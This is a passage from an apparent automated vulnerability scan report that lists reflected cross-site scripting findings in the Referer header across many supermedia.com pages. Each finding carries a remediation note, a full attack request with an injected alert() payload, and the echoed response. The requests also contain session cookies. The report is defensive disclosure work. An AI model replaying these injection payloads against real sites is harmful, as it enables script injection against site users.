Connection: close
Cache-Control: private
Content-Length: 20754


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="d8c66"-alert(1)-"92f4c806eeb";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

1.481. http://www.supermedia.com/support/help/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /support/help/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13f3c"-alert(1)-"f8f23428e65 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/help/ HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;
Referer: 13f3c"-alert(1)-"f8f23428e65

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:22:54 GMT
Content-Type: text/html;charset=UTF-8
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="13f3c"-alert(1)-"f8f23428e65";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

1.482. http://www.supermedia.com/yellow-pages/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /yellow-pages/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1d1e"-alert(1)-"7bc6b80740c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yellow-pages/ HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;
Referer: e1d1e"-alert(1)-"7bc6b80740c

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:23:19 GMT
Content-Type: text/html;charset=UTF-8
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="e1d1e"-alert(1)-"7bc6b80740c";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

1.483. https://www.supermedia.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d0f4"-alert(1)-"3372c90867f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=8d0f4"-alert(1)-"3372c90867f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761715|check#true#1296759915; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:11:10 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 30942


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Small Business Marketing and Internet Advertising | SuperMedia.com</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=8d0f4"-alert(1)-"3372c90867f";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

1.484. https://www.supermedia.com/signin [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /signin

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 327fc"-alert(1)-"221a82e08e1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /signin HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763571|check#true#1296761771; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Referer: http://www.google.com/search?hl=en&q=327fc"-alert(1)-"221a82e08e1

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:48:57 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 24711


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=327fc"-alert(1)-"221a82e08e1";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

1.485. https://www.supermedia.com/spportal/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ba03"-alert(1)-"bdea14bb63f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/ HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource="SP198c8\"; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; JSESSIONID=CD1B75B428F192D4B130C351A3081BAE.app2-a1; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1296783972284-771336#1296786095|check#true#1296784295; s_cc=true; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit
Referer: http://www.google.com/search?hl=en&q=8ba03"-alert(1)-"bdea14bb63f

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 04 Feb 2011 18:00:31 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 30942


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Small Business Marketing and Internet Advertising | SuperMedia.com</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=8ba03"-alert(1)-"bdea14bb63f";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

1.486. https://www.supermedia.com/spportal/404.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/404.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecec8"-alert(1)-"4dc26327075 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/404.jsp HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761701|check#true#1296759901; s_cc=true; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit
Referer: http://www.google.com/search?hl=en&q=ecec8"-alert(1)-"4dc26327075

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:06:34 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20885


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=ecec8"-alert(1)-"4dc26327075";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

1.487. https://www.supermedia.com/spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e44c7"-alert(1)-"c8e3ca72d49 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e44c7"-alert(1)-"c8e3ca72d49
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D; mbox=session#1296759528614-838261#1296762069|check#true#1296760269

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:21:26 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20904


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=e44c7"-alert(1)-"c8e3ca72d49";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

1.488. https://www.supermedia.com/spportal/login.do [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/login.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0f11"-alert(1)-"6068412b7ff was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/login.do HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource="SP198c8\"; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; JSESSIONID=CD1B75B428F192D4B130C351A3081BAE.app2-a1; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b
Referer: http://www.google.com/search?hl=en&q=c0f11"-alert(1)-"6068412b7ff

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 04 Feb 2011 01:47:44 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 24711


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=c0f11"-alert(1)-"6068412b7ff";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

1.489. https://www.supermedia.com/spportal/myaccount.do [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/myaccount.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94ca4"-alert(1)-"a229106b012 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/myaccount.do;jsessionid=CD1B75B428F192D4B130C351A3081BAE.app2-a1 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource="SP198c8\"; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; JSESSIONID=CD1B75B428F192D4B130C351A3081BAE.app2-a1; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b
Referer: http://www.google.com/search?hl=en&q=94ca4"-alert(1)-"a229106b012

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 04 Feb 2011 01:48:17 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 24711


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=94ca4"-alert(1)-"a229106b012";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

1.490. https://www.supermedia.com/spportal/spportalFlow [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 362e4"-alert(1)-"35b4846cf0a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/spportalFlow HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296764957|check#true#1296763157; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Referer: http://www.google.com/search?hl=en&q=362e4"-alert(1)-"35b4846cf0a

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 20:27:16 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20885


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=362e4"-alert(1)-"35b4846cf0a";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

1.491. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa04d"-alert(1)-"18e25f0779e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
